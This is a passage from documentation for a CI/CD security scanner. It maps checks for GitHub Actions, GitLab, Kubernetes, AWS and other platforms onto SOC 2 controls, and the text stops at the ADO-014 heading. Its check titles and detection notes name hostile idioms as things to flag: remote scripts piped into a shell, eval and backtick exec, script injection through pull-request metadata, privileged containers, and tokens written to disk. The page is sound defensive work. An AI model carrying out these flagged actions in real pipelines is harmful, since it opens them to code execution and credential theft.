SOC 2 Trust Services Criteria
- Version: 2017 (revised 2022)
- URL: https://www.aicpa-cima.com/resources/download/2017-trust-services-criteria-with-revised-points-of-focus-2022
- Source of truth:
pipeline_check/core/standards/data/soc2.py
SOC 2 Trust Services Criteria, CI/CD-relevant subset. Findings evidence control gaps; they are not a substitute for an auditor's opinion. Use this page to prepare CC6 / CC7 / CC8 evidence walks.
At a glance
- Controls in this standard: 11
- Controls evidenced by at least one check: 11 / 11
- Distinct checks evidencing this standard: 231
- Of those, autofixable with
--fix: 71
How to read severity
Every check below ships at a fixed severity level. The scale is the same across providers and standards so a CRITICAL finding in one place means the same thing as a CRITICAL finding anywhere else.
| Level | What it means | Examples |
|---|---|---|
| CRITICAL | Active exploit primitive in the workflow as written. Treat as P0: a default scan path lands an attacker on a secret, an RCE, or production write access without further effort. | Hardcoded credential literal, branch ref pointing at a known-compromised action, signed-into-an-unverified registry. |
| HIGH | Production-impact gap that requires modest attacker effort or a second condition to weaponize. Remediate this sprint; the secondary condition is usually already present in real pipelines. | Action pinned to a floating tag, sensitive permissions on a low-popularity action, mutable container tag in prod. |
| MEDIUM | Significant defense-in-depth gap. Not directly exploitable on its own but disables a control whose absence widens the blast radius of a separate compromise. Backlog with a deadline. | Missing branch protection, container without resource limits, freshly-published dependency consumed before the cooldown window. |
| LOW | Hygiene / hardening issue. Not a vulnerability on its own but raises baseline posture and reduces audit friction. | Missing CI logging retention, SBOM without supplier attribution, ECR repo without scan-on-push. |
| INFO | Degraded-mode signal. The scanner couldn't reach an API or parse a config and surfaces the gap so the operator knows coverage was incomplete. No finding against the workload itself. | CB-000 CodeBuild API access failed, IAM-000 IAM enumeration failed. |
Coverage by control
Click a control ID to jump to the per-control section with the full check list. The severity mix column shows the spread of evidencing checks by severity (Critical / High / Medium / Low / Info).
| Control | Title | Checks | Severity mix |
|---|---|---|---|
CC6.1 |
Logical access controls restrict entities to authorized system resources | 37 | 9C · 16H · 10M · 2L |
CC6.2 |
New internal and external users are registered, authorized, and provisioned | 20 | 10C · 4H · 6M |
CC6.3 |
Access modifications (including revocation) are tracked and timely | 12 | 5H · 7M |
CC6.6 |
Boundary-protection measures restrict access from outside the system boundary | 31 | 11C · 7H · 12M · 1L |
CC6.7 |
Data in transit is protected from unauthorized disclosure | 14 | 10H · 3M · 1L |
CC6.8 |
Controls prevent or detect the introduction of malicious software | 58 | 11C · 33H · 14M |
CC7.1 |
Detection procedures identify configuration changes that introduce vulnerabilities | 6 | 2H · 3M · 1L |
CC7.2 |
System components are monitored for anomalies indicative of malicious acts or failures | 15 | 1H · 8M · 6L |
CC7.3 |
Security events are evaluated to determine if they require response | 1 | 1M |
CC7.4 |
Identified security incidents trigger a response process | 2 | 2M |
CC8.1 |
Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented | 53 | 23H · 28M · 2L |
Filter at runtime
Restrict a scan to checks that evidence this standard with --standard soc2:
# All providers, only checks tied to this standard
pipeline_check --standard soc2
# Compose with --pipeline to scope by provider
pipeline_check --pipeline github --standard soc2
# Compose with another standard to widen the lens
pipeline_check --pipeline aws --standard soc2 --standard owasp_cicd_top_10
Controls in scope
CC6.1: Logical access controls restrict entities to authorized system resources
Evidenced by 37 checks across 9 providers (AWS, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
BB-017 |
Repository token written to persistent storage | CRITICAL | Bitbucket | 🔧 fix |
BK-002 |
Literal secret value in pipeline env block | CRITICAL | Buildkite | 🔧 fix |
BK-005 |
Container started with --privileged or host-bind escalation | HIGH | Buildkite | 🔧 fix |
BK-006 |
Step has no timeout_in_minutes | LOW | Buildkite | |
CA-004 |
CodeArtifact repo policy grants codeartifact: with Resource '' | HIGH | AWS | |
CC-030 |
Workflow job uses context without branch filter or approval gate | MEDIUM | CircleCI | |
CCM-003 |
CodeCommit trigger targets SNS/Lambda in a different account | MEDIUM | AWS | |
DF-002 |
Container runs as root (missing or root USER directive) | HIGH | Dockerfile | 🔧 fix |
DF-006 |
ENV or ARG carries a credential-shaped literal value | CRITICAL | Dockerfile | |
DF-008 |
RUN invokes docker --privileged or escalates capabilities | HIGH | Dockerfile | |
DF-012 |
RUN invokes sudo | HIGH | Dockerfile | |
DF-019 |
COPY/ADD source path looks like a credential file | HIGH | Dockerfile | 🔧 fix |
DF-020 |
ARG declares a credential-named build argument | HIGH | Dockerfile | 🔧 fix |
GCB-002 |
Cloud Build uses the default service account | HIGH | Cloud Build | |
GHA-004 |
Workflow has no explicit permissions block | MEDIUM | GitHub Actions | 🔧 fix |
GHA-019 |
GITHUB_TOKEN written to persistent storage | CRITICAL | GitHub Actions | 🔧 fix |
GL-020 |
CI_JOB_TOKEN written to persistent storage | CRITICAL | GitLab CI | 🔧 fix |
IAM-001 |
CI/CD role has AdministratorAccess policy attached | CRITICAL | AWS | |
IAM-002 |
CI/CD role has wildcard Action in attached policy | HIGH | AWS | |
IAM-003 |
CI/CD role has no permission boundary | MEDIUM | AWS | |
IAM-004 |
CI/CD role can PassRole to any role | HIGH | AWS | |
IAM-006 |
Sensitive actions granted with wildcard Resource | MEDIUM | AWS | |
K8S-011 |
Pod serviceAccountName unset or 'default' | MEDIUM | Kubernetes | |
K8S-012 |
Pod automountServiceAccountToken not false | MEDIUM | Kubernetes | |
K8S-017 |
Container env value carries a credential-shaped literal | CRITICAL | Kubernetes | |
K8S-018 |
Secret stringData/data carries a credential-shaped literal | CRITICAL | Kubernetes | |
K8S-019 |
Workload deployed in the 'default' namespace | LOW | Kubernetes | |
K8S-020 |
ClusterRoleBinding grants cluster-admin or system:masters | CRITICAL | Kubernetes | 🔧 fix |
K8S-021 |
Role or ClusterRole grants wildcard verbs+resources | HIGH | Kubernetes | |
K8S-029 |
RoleBinding grants permissions to the default ServiceAccount | HIGH | Kubernetes | 🔧 fix |
K8S-034 |
ServiceAccount automountServiceAccountToken not explicitly false | MEDIUM | Kubernetes | |
K8S-037 |
ConfigMap data carries a credential-shaped literal | HIGH | Kubernetes | |
KMS-002 |
KMS key policy grants wildcard KMS actions | HIGH | AWS | |
PBAC-001 |
CodeBuild project has no VPC configuration | HIGH | AWS | |
PBAC-002 |
CodeBuild service role shared across multiple projects | MEDIUM | AWS | |
PBAC-003 |
CodeBuild security group allows 0.0.0.0/0 all-port egress | MEDIUM | AWS | |
PBAC-005 |
CodePipeline stage action roles mirror the pipeline role | HIGH | AWS |
CC6.2: New internal and external users are registered, authorized, and provisioned
Evidenced by 20 checks across 8 providers (AWS, Azure DevOps, Bitbucket, CircleCI, Cloud Build, GitHub Actions, GitLab CI, Jenkins).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-003 |
Variables contain literal secret values | CRITICAL | Azure DevOps | |
ADO-008 |
Credential-shaped literal in pipeline body | CRITICAL | Azure DevOps | 🔧 fix |
ADO-014 |
AWS auth uses long-lived access keys | MEDIUM | Azure DevOps | 🔧 fix |
BB-003 |
Variables contain literal secret values | CRITICAL | Bitbucket | |
BB-008 |
Credential-shaped literal in pipeline body | CRITICAL | Bitbucket | 🔧 fix |
BB-011 |
AWS auth uses long-lived access keys | MEDIUM | Bitbucket | 🔧 fix |
CB-001 |
Secrets in plaintext environment variables | CRITICAL | AWS | |
CC-005 |
AWS auth uses long-lived access keys in environment block | MEDIUM | CircleCI | 🔧 fix |
CC-008 |
Credential-shaped literal in config body | CRITICAL | CircleCI | 🔧 fix |
GCB-003 |
Secret Manager value referenced in step args | HIGH | Cloud Build | |
GHA-005 |
AWS auth uses long-lived access keys | MEDIUM | GitHub Actions | 🔧 fix |
GHA-008 |
Credential-shaped literal in workflow body | CRITICAL | GitHub Actions | 🔧 fix |
GL-003 |
Variables contain literal secret values | CRITICAL | GitLab CI | |
GL-008 |
Credential-shaped literal in pipeline body | CRITICAL | GitLab CI | 🔧 fix |
GL-013 |
AWS auth uses long-lived access keys | MEDIUM | GitLab CI | 🔧 fix |
IAM-005 |
CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
IAM-008 |
OIDC-federated role trust policy missing audience or subject pin | HIGH | AWS | |
JF-004 |
AWS auth uses long-lived access keys via withCredentials | MEDIUM | Jenkins | 🔧 fix |
JF-008 |
Credential-shaped literal in pipeline body | CRITICAL | Jenkins | 🔧 fix |
JF-010 |
Long-lived AWS keys exposed via environment {} block | HIGH | Jenkins | 🔧 fix |
CC6.3: Access modifications (including revocation) are tracked and timely
Evidenced by 12 checks across 8 providers (AWS, Azure DevOps, Bitbucket, CircleCI, Cloud Build, GitHub Actions, GitLab CI, Jenkins).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-014 |
AWS auth uses long-lived access keys | MEDIUM | Azure DevOps | 🔧 fix |
BB-011 |
AWS auth uses long-lived access keys | MEDIUM | Bitbucket | 🔧 fix |
CB-006 |
CodeBuild source auth uses long-lived token | HIGH | AWS | |
CC-005 |
AWS auth uses long-lived access keys in environment block | MEDIUM | CircleCI | 🔧 fix |
CC-019 |
add_ssh_keys without fingerprint restriction |
HIGH | CircleCI | |
CP-004 |
Legacy ThirdParty/GitHub source action (OAuth token) | HIGH | AWS | |
GCB-007 |
availableSecrets references versions/latest |
MEDIUM | Cloud Build | 🔧 fix |
GHA-005 |
AWS auth uses long-lived access keys | MEDIUM | GitHub Actions | 🔧 fix |
GL-013 |
AWS auth uses long-lived access keys | MEDIUM | GitLab CI | 🔧 fix |
IAM-005 |
CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
IAM-007 |
IAM user has access key older than 90 days | HIGH | AWS | |
JF-004 |
AWS auth uses long-lived access keys via withCredentials | MEDIUM | Jenkins | 🔧 fix |
CC6.6: Boundary-protection measures restrict access from outside the system boundary
Evidenced by 31 checks across 9 providers (AWS, Azure DevOps, Bitbucket, CircleCI, Dockerfile, GitHub Actions, GitLab CI, Jenkins, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-013 |
Self-hosted pool without explicit ephemeral marker | MEDIUM | Azure DevOps | |
ADO-017 |
Docker run with insecure flags (privileged/host mount) | CRITICAL | Azure DevOps | 🔧 fix |
BB-013 |
Docker run with insecure flags (privileged/host mount) | CRITICAL | Bitbucket | 🔧 fix |
BB-016 |
Self-hosted runner without ephemeral marker | MEDIUM | Bitbucket | |
CB-002 |
Privileged mode enabled | HIGH | AWS | |
CC-010 |
Self-hosted runner without ephemeral marker | MEDIUM | CircleCI | |
CC-017 |
Docker run with insecure flags (privileged/host mount) | CRITICAL | CircleCI | 🔧 fix |
CP-003 |
Source stage using polling instead of event-driven trigger | LOW | AWS | |
CP-007 |
CodePipeline v2 PR trigger accepts all branches | HIGH | AWS | |
DF-013 |
EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
ECR-003 |
Repository policy allows public access | CRITICAL | AWS | |
GHA-012 |
Self-hosted runner without ephemeral marker | MEDIUM | GitHub Actions | |
GHA-017 |
Docker run with insecure flags (privileged/host mount) | CRITICAL | GitHub Actions | 🔧 fix |
GHA-026 |
Container job disables isolation via options: |
HIGH | GitHub Actions | |
GL-014 |
Self-managed runner without ephemeral tag | MEDIUM | GitLab CI | |
GL-017 |
Docker run with insecure flags (privileged/host mount) | CRITICAL | GitLab CI | 🔧 fix |
JF-003 |
Pipeline uses agent any (no executor isolation) |
MEDIUM | Jenkins | |
JF-014 |
Agent label missing ephemeral marker | MEDIUM | Jenkins | |
JF-017 |
Docker run with insecure flags (privileged/host mount) | CRITICAL | Jenkins | 🔧 fix |
JF-025 |
Kubernetes agent pod template runs privileged or mounts hostPath | HIGH | Jenkins | |
K8S-002 |
Pod hostNetwork: true | HIGH | Kubernetes | 🔧 fix |
K8S-022 |
Service exposes SSH (port 22) | MEDIUM | Kubernetes | |
K8S-026 |
LoadBalancer Service has no loadBalancerSourceRanges | HIGH | Kubernetes | |
K8S-028 |
Container declares hostPort | MEDIUM | Kubernetes | 🔧 fix |
K8S-032 |
Namespace lacks default-deny NetworkPolicy | MEDIUM | Kubernetes | |
K8S-038 |
NetworkPolicy ingress / egress allows all sources or destinations | MEDIUM | Kubernetes | |
LMB-002 |
Lambda function URL has AuthType=NONE | HIGH | AWS | |
LMB-004 |
Lambda resource policy allows wildcard principal | CRITICAL | AWS | |
S3-001 |
Artifact bucket public access block not fully enabled | CRITICAL | AWS | |
S3-005 |
Artifact bucket missing aws:SecureTransport deny | MEDIUM | AWS | |
SM-002 |
Secrets Manager resource policy allows wildcard principal | CRITICAL | AWS |
CC6.7: Data in transit is protected from unauthorized disclosure
Evidenced by 14 checks across 11 providers (AWS, Azure DevOps, Bitbucket, Buildkite, CircleCI, Dockerfile, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-023 |
TLS / certificate verification bypass | HIGH | Azure DevOps | 🔧 fix |
BB-023 |
TLS / certificate verification bypass | HIGH | Bitbucket | 🔧 fix |
BK-004 |
Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
BK-008 |
TLS verification disabled in step command | MEDIUM | Buildkite | 🔧 fix |
CC-023 |
TLS / certificate verification bypass | HIGH | CircleCI | 🔧 fix |
DF-003 |
ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
DF-004 |
RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
GHA-023 |
TLS / certificate verification bypass | HIGH | GitHub Actions | 🔧 fix |
GL-023 |
TLS / certificate verification bypass | HIGH | GitLab CI | 🔧 fix |
HELM-003 |
Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
HELM-009 |
Chart home / sources URL uses a non-HTTPS scheme | LOW | Helm | |
JF-023 |
TLS / certificate verification bypass | HIGH | Jenkins | 🔧 fix |
K8S-027 |
Ingress has no TLS configuration | MEDIUM | Kubernetes | |
S3-005 |
Artifact bucket missing aws:SecureTransport deny | MEDIUM | AWS |
CC6.8: Controls prevent or detect the introduction of malicious software
Evidenced by 58 checks across 11 providers (AWS, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Jenkins, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-002 |
Script injection via attacker-controllable context | HIGH | Azure DevOps | |
ADO-016 |
Remote script piped to shell interpreter | HIGH | Azure DevOps | 🔧 fix |
ADO-020 |
No vulnerability scanning step | MEDIUM | Azure DevOps | |
ADO-026 |
Pipeline contains indicators of malicious activity | CRITICAL | Azure DevOps | |
ADO-027 |
Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Azure DevOps | |
BB-002 |
Script injection via attacker-controllable context | HIGH | Bitbucket | |
BB-012 |
Remote script piped to shell interpreter | HIGH | Bitbucket | 🔧 fix |
BB-015 |
No vulnerability scanning step | MEDIUM | Bitbucket | |
BB-025 |
Pipeline contains indicators of malicious activity | CRITICAL | Bitbucket | |
BB-026 |
Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Bitbucket | |
BK-003 |
Untrusted Buildkite variable interpolated in command | HIGH | Buildkite | |
BK-005 |
Container started with --privileged or host-bind escalation | HIGH | Buildkite | 🔧 fix |
CB-011 |
CodeBuild buildspec contains indicators of malicious activity | CRITICAL | AWS | |
CC-002 |
Script injection via untrusted environment variable | HIGH | CircleCI | |
CC-016 |
Remote script piped to shell interpreter | HIGH | CircleCI | 🔧 fix |
CC-020 |
No vulnerability scanning step | MEDIUM | CircleCI | |
CC-026 |
Config contains indicators of malicious activity | CRITICAL | CircleCI | |
CC-027 |
Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | CircleCI | |
DF-002 |
Container runs as root (missing or root USER directive) | HIGH | Dockerfile | 🔧 fix |
DF-005 |
RUN uses shell-eval (eval / sh -c on a variable / backticks) | HIGH | Dockerfile | |
DF-008 |
RUN invokes docker --privileged or escalates capabilities | HIGH | Dockerfile | |
DF-013 |
EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
DF-014 |
WORKDIR set to a system / kernel filesystem path | CRITICAL | Dockerfile | |
DF-015 |
RUN grants world-writable permissions (chmod 777 / a+w) | MEDIUM | Dockerfile | |
DF-017 |
ENV PATH prepends a world-writable directory | MEDIUM | Dockerfile | 🔧 fix |
DF-018 |
RUN chown rewrites ownership of a system path | MEDIUM | Dockerfile | |
ECR-001 |
Image scanning on push not enabled | HIGH | AWS | |
ECR-007 |
Inspector v2 enhanced scanning disabled for ECR | MEDIUM | AWS | |
GCB-006 |
Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Cloud Build | |
GCB-008 |
No vulnerability scanning step in Cloud Build pipeline | MEDIUM | Cloud Build | |
GHA-003 |
Script injection via untrusted context | HIGH | GitHub Actions | 🔧 fix |
GHA-016 |
Remote script piped to shell interpreter | HIGH | GitHub Actions | 🔧 fix |
GHA-020 |
No vulnerability scanning step | MEDIUM | GitHub Actions | |
GHA-027 |
Workflow contains indicators of malicious activity | CRITICAL | GitHub Actions | |
GHA-028 |
Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | GitHub Actions | |
GL-002 |
Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
GL-016 |
Remote script piped to shell interpreter | HIGH | GitLab CI | 🔧 fix |
GL-019 |
No vulnerability scanning step | MEDIUM | GitLab CI | |
GL-025 |
Pipeline contains indicators of malicious activity | CRITICAL | GitLab CI | |
GL-026 |
Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | GitLab CI | |
JF-002 |
Script step interpolates attacker-controllable env var | HIGH | Jenkins | |
JF-016 |
Remote script piped to shell interpreter | HIGH | Jenkins | 🔧 fix |
JF-020 |
No vulnerability scanning step | MEDIUM | Jenkins | |
JF-029 |
Jenkinsfile contains indicators of malicious activity | CRITICAL | Jenkins | |
JF-030 |
Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Jenkins | |
K8S-003 |
Pod hostPID: true | HIGH | Kubernetes | 🔧 fix |
K8S-004 |
Pod hostIPC: true | HIGH | Kubernetes | 🔧 fix |
K8S-005 |
Container securityContext.privileged: true | CRITICAL | Kubernetes | 🔧 fix |
K8S-006 |
Container allowPrivilegeEscalation not explicitly false | HIGH | Kubernetes | 🔧 fix |
K8S-007 |
Container runAsNonRoot not true / runAsUser is 0 | HIGH | Kubernetes | 🔧 fix |
K8S-008 |
Container readOnlyRootFilesystem not true | MEDIUM | Kubernetes | 🔧 fix |
K8S-009 |
Container capabilities not dropping ALL / adding dangerous caps | HIGH | Kubernetes | |
K8S-010 |
Container seccompProfile not RuntimeDefault or Localhost | MEDIUM | Kubernetes | |
K8S-013 |
Pod uses a hostPath volume | HIGH | Kubernetes | 🔧 fix |
K8S-014 |
Pod hostPath references a sensitive host directory | CRITICAL | Kubernetes | |
K8S-035 |
Container securityContext.runAsUser is 0 | HIGH | Kubernetes | |
K8S-039 |
Pod uses shareProcessNamespace: true | MEDIUM | Kubernetes | |
K8S-040 |
Container securityContext.procMount: Unmasked | HIGH | Kubernetes |
CC7.1: Detection procedures identify configuration changes that introduce vulnerabilities
Evidenced by 6 checks across 4 providers (AWS, Buildkite, Cloud Build, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
BK-012 |
No vulnerability scanning step | MEDIUM | Buildkite | |
CB-005 |
Outdated managed build image | MEDIUM | AWS | |
ECR-002 |
Image tags are mutable | HIGH | AWS | |
GCB-007 |
availableSecrets references versions/latest |
MEDIUM | Cloud Build | 🔧 fix |
K8S-023 |
Namespace missing Pod Security Admission enforcement label | HIGH | Kubernetes | |
K8S-031 |
Namespace missing PSA warn label | LOW | Kubernetes |
CC7.2: System components are monitored for anomalies indicative of malicious acts or failures
Evidenced by 15 checks across 5 providers (AWS, CircleCI, Dockerfile, Jenkins, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CB-003 |
Build logging not enabled | MEDIUM | AWS | |
CC-011 |
No store_test_results step (test results not archived) | LOW | CircleCI | |
CT-001 |
No active CloudTrail trail in region | HIGH | AWS | |
CT-002 |
CloudTrail log-file validation disabled | MEDIUM | AWS | |
CT-003 |
CloudTrail trail is not multi-region | MEDIUM | AWS | |
CW-001 |
No CloudWatch alarm on CodeBuild FailedBuilds metric | LOW | AWS | |
CWL-001 |
CodeBuild log group has no retention policy | LOW | AWS | |
CWL-002 |
CodeBuild log group not KMS-encrypted | MEDIUM | AWS | |
DF-007 |
No HEALTHCHECK directive declared | LOW | Dockerfile | 🔧 fix |
EB-001 |
No EventBridge rule for CodePipeline failure notifications | MEDIUM | AWS | |
JF-011 |
Pipeline has no buildDiscarder retention policy |
LOW | Jenkins | 🔧 fix |
K8S-024 |
Container missing both livenessProbe and readinessProbe | MEDIUM | Kubernetes | |
K8S-033 |
Namespace lacks ResourceQuota or LimitRange | MEDIUM | Kubernetes | |
S3-003 |
Artifact bucket versioning not enabled | MEDIUM | AWS | |
S3-004 |
Artifact bucket access logging not enabled | LOW | AWS |
CC7.3: Security events are evaluated to determine if they require response
Evidenced by 1 check across AWS.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CD-003 |
No CloudWatch alarm monitoring on deployment group | MEDIUM | AWS |
CC7.4: Identified security incidents trigger a response process
Evidenced by 2 checks across AWS.
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
CD-001 |
Automatic rollback on failure not enabled | MEDIUM | AWS | |
CD-003 |
No CloudWatch alarm monitoring on deployment group | MEDIUM | AWS |
CC8.1: Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented
Evidenced by 53 checks across 12 providers (AWS, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
ADO-001 |
Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
ADO-004 |
Deployment job missing environment binding | MEDIUM | Azure DevOps | |
ADO-024 |
No SLSA provenance attestation produced | MEDIUM | Azure DevOps | |
ADO-025 |
Cross-repo template not pinned to commit SHA | HIGH | Azure DevOps | |
BB-001 |
pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
BB-004 |
Deploy step missing deployment: environment gate |
MEDIUM | Bitbucket | |
BB-024 |
No SLSA provenance attestation produced | MEDIUM | Bitbucket | |
BK-001 |
Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
BK-004 |
Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
BK-007 |
Deploy step not gated by a manual block / input | MEDIUM | Buildkite | |
BK-009 |
Artifacts not signed (no cosign/sigstore step) | MEDIUM | Buildkite | |
BK-010 |
No SBOM generated for build artifacts | MEDIUM | Buildkite | |
BK-011 |
No SLSA provenance attestation produced | MEDIUM | Buildkite | |
BK-013 |
Deploy step has no branches: filter | MEDIUM | Buildkite | |
CB-008 |
CodeBuild buildspec is inline (not sourced from a protected repo) | HIGH | AWS | |
CC-001 |
Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
CC-009 |
Deploy job missing manual approval gate | MEDIUM | CircleCI | |
CC-013 |
Deploy job in workflow has no branch filter | MEDIUM | CircleCI | |
CC-024 |
No SLSA provenance attestation produced | MEDIUM | CircleCI | |
CCM-001 |
CodeCommit repository has no approval rule template attached | HIGH | AWS | |
CD-002 |
AllAtOnce deployment config, no canary or rolling strategy | HIGH | AWS | |
CP-001 |
No approval action before deploy stages | HIGH | AWS | |
CP-005 |
Production Deploy stage has no preceding ManualApproval | MEDIUM | AWS | |
DF-001 |
FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
DF-003 |
ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
DF-004 |
RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
DF-010 |
apt-get dist-upgrade / upgrade pulls unknown package versions | LOW | Dockerfile | |
DF-016 |
Image lacks OCI provenance labels | LOW | Dockerfile | |
GCB-001 |
Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
GCB-009 |
Artifacts not signed (no cosign / sigstore step) | MEDIUM | Cloud Build | |
GHA-001 |
Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
GHA-014 |
Deploy job missing environment binding | MEDIUM | GitHub Actions | 🔧 fix |
GHA-024 |
No SLSA provenance attestation produced | MEDIUM | GitHub Actions | |
GHA-025 |
Reusable workflow not pinned to commit SHA | HIGH | GitHub Actions | |
GL-001 |
Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
GL-004 |
Deploy job lacks manual approval or environment gate | MEDIUM | GitLab CI | |
GL-005 |
include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
GL-024 |
No SLSA provenance attestation produced | MEDIUM | GitLab CI | |
GL-029 |
Manual deploy job defaults to allow_failure: true | MEDIUM | GitLab CI | |
HELM-001 |
Chart.yaml declares legacy apiVersion: v1 | MEDIUM | Helm | 🔧 fix |
HELM-002 |
Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
HELM-003 |
Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
HELM-004 |
Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
HELM-008 |
Chart.lock generated more than 90 days ago | MEDIUM | Helm | |
JF-001 |
Shared library not pinned to a tag or commit | HIGH | Jenkins | |
JF-005 |
Deploy stage missing manual input approval |
MEDIUM | Jenkins | |
JF-024 |
input approval step missing submitter restriction |
MEDIUM | Jenkins | |
JF-026 |
build job: trigger ignores downstream failure |
MEDIUM | Jenkins | |
JF-028 |
No SLSA provenance attestation produced | MEDIUM | Jenkins | |
K8S-001 |
Container image not pinned by sha256 digest | HIGH | Kubernetes | 🔧 fix |
K8S-036 |
ServiceAccount imagePullSecrets references missing Secret | MEDIUM | Kubernetes | |
SIGN-001 |
No AWS Signer profile defined for Lambda deploys | MEDIUM | AWS | |
SIGN-002 |
AWS Signer profile is revoked or inactive | HIGH | AWS |
Check details
Every check that evidences this standard, rendered once with its detection mechanism, recommendation, and any known false-positive modes or real-world incident references. The per-control tables above link to the matching block here.
ADO-001: Task reference not pinned to specific version HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Floating-major task references (@1, @2) can roll forward silently when the task publisher ships a breaking or malicious update. Pass when every task: reference carries a two- or three-segment semver.
Recommendation. Reference tasks by a full semver (DownloadSecureFile@1.2.3) or extension-published-version. Track task updates explicitly via Azure DevOps extension settings rather than letting @1 drift.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-001 in the Azure DevOps provider.
ADO-002: Script injection via attacker-controllable context HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. $(Build.SourceBranch*), $(Build.SourceVersionMessage), and $(System.PullRequest.*) are populated from SCM event metadata the attacker controls. Inline interpolation into a script body executes crafted content.
Recommendation. Pass these values through an intermediate pipeline variable declared with readonly: true, and reference that variable through an environment variable rather than $(...) macro interpolation. ADO expands $(…) before shell quoting, so inline use is never safe.
Source: ADO-002 in the Azure DevOps provider.
ADO-003: Variables contain literal secret values CRITICAL
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Scans variables: in both the mapping form ({KEY: VAL}) and the list form ([{name: X, value: Y}]) that ADO supports. AWS keys are detected by value shape regardless of variable name.
Recommendation. Store secrets in an Azure Key Vault or a Library variable group with the secret flag set; reference them via $(SECRET_NAME) at runtime. For cloud access prefer Azure workload identity federation.
Source: ADO-003 in the Azure DevOps provider.
ADO-004: Deployment job missing environment binding MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Without an environment: binding, ADO cannot enforce approvals, checks, or deployment history against a named resource. Every deployment: job should bind one.
Recommendation. Add environment: <name> to every deployment: job. Configure approvals, required branches, and business-hours checks on the matching Environment in the ADO UI.
Source: ADO-004 in the Azure DevOps provider.
ADO-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Complements ADO-003 (which looks at variables: keys). ADO-008 scans every string in the pipeline against the cross-provider credential-pattern catalog.
Recommendation. Rotate the exposed credential. Move the value to Azure Key Vault or a secret variable group and reference it via $(SECRET_NAME).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example
AKIAIOSFODNN7EXAMPLEis deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: ADO-008 in the Azure DevOps provider.
ADO-013: Self-hosted pool without explicit ephemeral marker MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. pool: { name: <agent-pool> } (or the bare string form pool: <name>) targets a self-hosted agent pool. Without an explicit ephemeral arrangement, agents reuse state across jobs. Microsoft-hosted pools (vmImage: or the Azure Pipelines / Default names) are skipped.
Recommendation. Configure the agent pool with autoscaling + ephemeral agents (the Azure VM Scale Set agent), and add demands: [ephemeral -equals true] on the pool block so this check can verify it.
Source: ADO-013 in the Azure DevOps provider.
ADO-014: AWS auth uses long-lived access keys MEDIUM 🔧 fix
